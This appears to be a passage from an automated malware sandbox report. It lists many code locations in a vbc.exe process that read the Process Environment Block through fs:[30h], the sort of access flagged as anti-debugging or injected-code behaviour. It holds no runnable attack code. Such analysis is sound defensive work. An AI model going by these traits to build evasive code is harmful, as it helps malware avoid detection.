            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515645D mov eax, dword ptr fs:[00000030h]3_2_0515645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B440 mov eax, dword ptr fs:[00000030h]3_2_0516B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B440 mov eax, dword ptr fs:[00000030h]3_2_0516B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B440 mov eax, dword ptr fs:[00000030h]3_2_0516B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B440 mov eax, dword ptr fs:[00000030h]3_2_0516B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B440 mov eax, dword ptr fs:[00000030h]3_2_0516B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B440 mov eax, dword ptr fs:[00000030h]3_2_0516B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E443 mov eax, dword ptr fs:[00000030h]3_2_0519E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E443 mov eax, dword ptr fs:[00000030h]3_2_0519E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E443 mov eax, dword ptr fs:[00000030h]3_2_0519E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E443 mov eax, dword ptr fs:[00000030h]3_2_0519E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E443 mov eax, dword ptr fs:[00000030h]3_2_0519E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E443 mov eax, dword ptr fs:[00000030h]3_2_0519E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E443 mov eax, dword ptr fs:[00000030h]3_2_0519E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E443 mov eax, dword ptr fs:[00000030h]3_2_0519E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0523547F mov eax, dword ptr fs:[00000030h]3_2_0523547F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518A470 mov eax, dword ptr fs:[00000030h]3_2_0518A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518A470 mov eax, dword ptr fs:[00000030h]3_2_0518A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518A470 mov eax, dword ptr fs:[00000030h]3_2_0518A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521F453 mov eax, dword ptr fs:[00000030h]3_2_0521F453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05161460 mov eax, dword ptr fs:[00000030h]3_2_05161460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05161460 mov eax, dword ptr fs:[00000030h]3_2_05161460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05161460 mov eax, dword ptr fs:[00000030h]3_2_05161460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05161460 mov eax, dword ptr fs:[00000030h]3_2_05161460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05161460 mov eax, dword ptr fs:[00000030h]3_2_05161460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517F460 mov eax, dword ptr fs:[00000030h]3_2_0517F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517F460 mov eax, dword ptr fs:[00000030h]3_2_0517F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517F460 mov eax, dword ptr fs:[00000030h]3_2_0517F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517F460 mov eax, dword ptr fs:[00000030h]3_2_0517F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517F460 mov eax, dword ptr fs:[00000030h]3_2_0517F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517F460 mov eax, dword ptr fs:[00000030h]3_2_0517F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05169486 mov eax, dword ptr fs:[00000030h]3_2_05169486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05169486 mov eax, dword ptr fs:[00000030h]3_2_05169486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B480 mov eax, dword ptr fs:[00000030h]3_2_0515B480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051934B0 mov eax, dword ptr fs:[00000030h]3_2_051934B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051944B0 mov ecx, dword ptr fs:[00000030h]3_2_051944B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EA4B0 mov eax, dword ptr fs:[00000030h]3_2_051EA4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051664AB mov eax, dword ptr fs:[00000030h]3_2_051664AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052094E0 mov eax, dword ptr fs:[00000030h]3_2_052094E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051604E5 mov ecx, dword ptr fs:[00000030h]3_2_051604E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052354DB mov eax, dword ptr fs:[00000030h]3_2_052354DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05160710 mov eax, dword ptr fs:[00000030h]3_2_05160710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519F71F mov eax, dword ptr fs:[00000030h]3_2_0519F71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519F71F mov eax, dword ptr fs:[00000030h]3_2_0519F71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522972B mov eax, dword ptr fs:[00000030h]3_2_0522972B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05190710 mov eax, dword ptr fs:[00000030h]3_2_05190710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521F72E mov eax, dword ptr fs:[00000030h]3_2_0521F72E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05165702 mov eax, dword ptr fs:[00000030h]3_2_05165702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05165702 mov eax, dword ptr fs:[00000030h]3_2_05165702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05167703 mov eax, dword ptr fs:[00000030h]3_2_05167703
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519C700 mov eax, dword ptr fs:[00000030h]3_2_0519C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0523B73C mov eax, dword ptr fs:[00000030h]3_2_0523B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0523B73C mov eax, dword ptr fs:[00000030h]3_2_0523B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0523B73C mov eax, dword ptr fs:[00000030h]3_2_0523B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0523B73C mov eax, dword ptr fs:[00000030h]3_2_0523B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519273C mov eax, dword ptr fs:[00000030h]3_2_0519273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519273C mov ecx, dword ptr fs:[00000030h]3_2_0519273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519273C mov eax, dword ptr fs:[00000030h]3_2_0519273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05159730 mov eax, dword ptr fs:[00000030h]3_2_05159730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05159730 mov eax, dword ptr fs:[00000030h]3_2_05159730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516973A mov eax, dword ptr fs:[00000030h]3_2_0516973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516973A mov eax, dword ptr fs:[00000030h]3_2_0516973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DC730 mov eax, dword ptr fs:[00000030h]3_2_051DC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05195734 mov eax, dword ptr fs:[00000030h]3_2_05195734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05163720 mov eax, dword ptr fs:[00000030h]3_2_05163720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517F720 mov eax, dword ptr fs:[00000030h]3_2_0517F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517F720 mov eax, dword ptr fs:[00000030h]3_2_0517F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517F720 mov eax, dword ptr fs:[00000030h]3_2_0517F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519C720 mov eax, dword ptr fs:[00000030h]3_2_0519C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519C720 mov eax, dword ptr fs:[00000030h]3_2_0519C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05160750 mov eax, dword ptr fs:[00000030h]3_2_05160750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2750 mov eax, dword ptr fs:[00000030h]3_2_051A2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2750 mov eax, dword ptr fs:[00000030h]3_2_051A2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E4755 mov eax, dword ptr fs:[00000030h]3_2_051E4755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519674D mov esi, dword ptr fs:[00000030h]3_2_0519674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519674D mov eax, dword ptr fs:[00000030h]3_2_0519674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519674D mov eax, dword ptr fs:[00000030h]3_2_0519674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05173740 mov eax, dword ptr fs:[00000030h]3_2_05173740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05173740 mov eax, dword ptr fs:[00000030h]3_2_05173740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05173740 mov eax, dword ptr fs:[00000030h]3_2_05173740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05168770 mov eax, dword ptr fs:[00000030h]3_2_05168770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170770 mov eax, dword ptr fs:[00000030h]3_2_05170770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05233749 mov eax, dword ptr fs:[00000030h]3_2_05233749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B765 mov eax, dword ptr fs:[00000030h]3_2_0515B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B765 mov eax, dword ptr fs:[00000030h]3_2_0515B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B765 mov eax, dword ptr fs:[00000030h]3_2_0515B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B765 mov eax, dword ptr fs:[00000030h]3_2_0515B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052337B6 mov eax, dword ptr fs:[00000030h]3_2_052337B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518D7B0 mov eax, dword ptr fs:[00000030h]3_2_0518D7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521F78A mov eax, dword ptr fs:[00000030h]3_2_0521F78A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F7BA mov eax, dword ptr fs:[00000030h]3_2_0515F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F7BA mov eax, dword ptr fs:[00000030h]3_2_0515F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F7BA mov eax, dword ptr fs:[00000030h]3_2_0515F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F7BA mov eax, dword ptr fs:[00000030h]3_2_0515F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F7BA mov eax, dword ptr fs:[00000030h]3_2_0515F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F7BA mov eax, dword ptr fs:[00000030h]3_2_0515F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F7BA mov eax, dword ptr fs:[00000030h]3_2_0515F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F7BA mov eax, dword ptr fs:[00000030h]3_2_0515F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F7BA mov eax, dword ptr fs:[00000030h]3_2_0515F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EF7AF mov eax, dword ptr fs:[00000030h]3_2_051EF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EF7AF mov eax, dword ptr fs:[00000030h]3_2_051EF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EF7AF mov eax, dword ptr fs:[00000030h]3_2_051EF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EF7AF mov eax, dword ptr fs:[00000030h]3_2_051EF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EF7AF mov eax, dword ptr fs:[00000030h]3_2_051EF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E97A9 mov eax, dword ptr fs:[00000030h]3_2_051E97A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051607AF mov eax, dword ptr fs:[00000030h]3_2_051607AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516C7C0 mov eax, dword ptr fs:[00000030h]3_2_0516C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051657C0 mov eax, dword ptr fs:[00000030h]3_2_051657C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051657C0 mov eax, dword ptr fs:[00000030h]3_2_051657C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051657C0 mov eax, dword ptr fs:[00000030h]3_2_051657C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E07C3 mov eax, dword ptr fs:[00000030h]3_2_051E07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051647FB mov eax, dword ptr fs:[00000030h]3_2_051647FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051647FB mov eax, dword ptr fs:[00000030h]3_2_051647FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051827ED mov eax, dword ptr fs:[00000030h]3_2_051827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051827ED mov eax, dword ptr fs:[00000030h]3_2_051827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051827ED mov eax, dword ptr fs:[00000030h]3_2_051827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516D7E0 mov ecx, dword ptr fs:[00000030h]3_2_0516D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05163616 mov eax, dword ptr fs:[00000030h]3_2_05163616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05163616 mov eax, dword ptr fs:[00000030h]3_2_05163616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2619 mov eax, dword ptr fs:[00000030h]3_2_051A2619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE609 mov eax, dword ptr fs:[00000030h]3_2_051DE609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05235636 mov eax, dword ptr fs:[00000030h]3_2_05235636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519F603 mov eax, dword ptr fs:[00000030h]3_2_0519F603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05191607 mov eax, dword ptr fs:[00000030h]3_2_05191607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517E627 mov eax, dword ptr fs:[00000030h]3_2_0517E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05196620 mov eax, dword ptr fs:[00000030h]3_2_05196620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05198620 mov eax, dword ptr fs:[00000030h]3_2_05198620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516262C mov eax, dword ptr fs:[00000030h]3_2_0516262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522866E mov eax, dword ptr fs:[00000030h]3_2_0522866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522866E mov eax, dword ptr fs:[00000030h]3_2_0522866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517C640 mov eax, dword ptr fs:[00000030h]3_2_0517C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05192674 mov eax, dword ptr fs:[00000030h]3_2_05192674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A660 mov eax, dword ptr fs:[00000030h]3_2_0519A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A660 mov eax, dword ptr fs:[00000030h]3_2_0519A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05199660 mov eax, dword ptr fs:[00000030h]3_2_05199660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05199660 mov eax, dword ptr fs:[00000030h]3_2_05199660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05164690 mov eax, dword ptr fs:[00000030h]3_2_05164690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05164690 mov eax, dword ptr fs:[00000030h]3_2_05164690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E368C mov eax, dword ptr fs:[00000030h]3_2_051E368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E368C mov eax, dword ptr fs:[00000030h]3_2_051E368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E368C mov eax, dword ptr fs:[00000030h]3_2_051E368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E368C mov eax, dword ptr fs:[00000030h]3_2_051E368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051576B2 mov eax, dword ptr fs:[00000030h]3_2_051576B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051576B2 mov eax, dword ptr fs:[00000030h]3_2_051576B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051576B2 mov eax, dword ptr fs:[00000030h]3_2_051576B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051966B0 mov eax, dword ptr fs:[00000030h]3_2_051966B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515D6AA mov eax, dword ptr fs:[00000030h]3_2_0515D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515D6AA mov eax, dword ptr fs:[00000030h]3_2_0515D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519C6A6 mov eax, dword ptr fs:[00000030h]3_2_0519C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521D6F0 mov eax, dword ptr fs:[00000030h]3_2_0521D6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051916CF mov eax, dword ptr fs:[00000030h]3_2_051916CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0519A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A6C7 mov eax, dword ptr fs:[00000030h]3_2_0519A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521F6C7 mov eax, dword ptr fs:[00000030h]3_2_0521F6C7
